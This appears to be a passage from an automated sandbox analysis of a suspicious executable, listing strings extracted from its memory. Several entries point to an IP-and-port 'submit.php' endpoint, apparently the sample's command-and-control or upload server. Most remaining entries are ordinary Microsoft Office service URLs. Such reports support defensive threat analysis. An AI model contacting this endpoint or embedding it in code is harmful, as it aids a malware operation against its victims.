00000003.00000003.533004895.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/submit.phpI
Source: ????????????.exe, 00000003.00000002.707570619.0000025BF3699000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/submit.phpParameters
Source: ????????????.exe, 00000003.00000003.511119713.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.446429982.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.459728313.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.455168561.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.565837469.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.468267152.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.472644248.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.450683931.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.463998398.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.507141900.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/submit.phpQ
Source: ????????????.exe, 00000003.00000002.707570619.0000025BF3699000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/submit.phpa19e716f260s
Source: ????????????.exe, 00000003.00000003.528285189.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.511119713.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.550870441.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.546326792.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.650269287.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000002.707886816.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.581376031.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.555953821.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.561061987.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.630445997.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.565837469.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.645791258.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.625692730.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.680612251.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.524018797.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.698330034.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.519760880.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.515437734.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.533004895.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.595821118.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/submit.phpc
Source: ????????????.exe, 00000003.00000003.528285189.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.511119713.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.550870441.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.546326792.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.650269287.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.446429982.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000002.707886816.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.459728313.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.455168561.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.581376031.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.555953821.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.561061987.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.630445997.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.565837469.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.645791258.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.468267152.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.472644248.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.625692730.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.680612251.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.450683931.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.524018797.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/submit.phpe
Source: ????????????.exe, 00000003.00000003.650269287.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000002.707886816.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.459728313.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.455168561.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.581376031.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.561061987.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.630445997.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.565837469.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.645791258.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.468267152.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.472644248.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.625692730.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.680612251.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.450683931.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.698330034.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.463998398.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.595821118.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/submit.phpo
Source: ????????????.exe, 00000003.00000003.533004895.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/submit.phpw
Source: ????????????.exe, 00000003.00000002.707682885.0000025BF36AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/submit.phpx
Source: ????????????.exe, 00000003.00000003.528285189.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.511119713.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.550870441.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.546326792.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.650269287.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000002.707886816.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.645791258.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.472644248.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.680612251.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.524018797.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.698330034.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.519760880.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.515437734.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.533004895.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.507141900.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/submit.phpy
Source: ????????????.exe, 00000003.00000002.707570619.0000025BF3699000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/ubmit.php
Source: ????????????.exe, 00000003.00000002.707570619.0000025BF3699000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/ubmit.phpn
Source: ????????????.exe, 00000003.00000002.707570619.0000025BF3699000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/ubmit.phpra
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://api.aadrm.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://api.aadrm.com/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://api.cortana.ai
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://api.diagnostics.office.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://api.office.net
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://api.onedrive.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://apis.live.net/v5.0/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://augloop.office.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://augloop.office.com/v2
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://cdn.entity.
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://clients.config.office.net/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://config.edge.skype.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://cortana.ai
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://cortana.ai/api
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://cr.office.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://dataservice.o365filtering.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://dev.cortana.ai
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://devnull.onenote.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://directory.services.
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://enrichment.osi.office.net/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://graph.ppe.windows.net
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://graph.ppe.windows.net/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://graph.windows.net
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://graph.windows.net/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://inclient.store.office.com/gyro/client
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://invites.office.com/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://lifecycle.office.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://login.microsoftonline.com/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://login.windows.local
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://management.azure.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://management.azure.com/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://messaging.action.office.com/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://messaging.engagement.office.com/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://messaging.lifecycle.office.com/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://messaging.office.com/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://my.microsoftpersonalcontent.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://ncus.contentsync.
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://ncus.pagecontentsync.
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://officeapps.live.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://onedrive.live.com
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
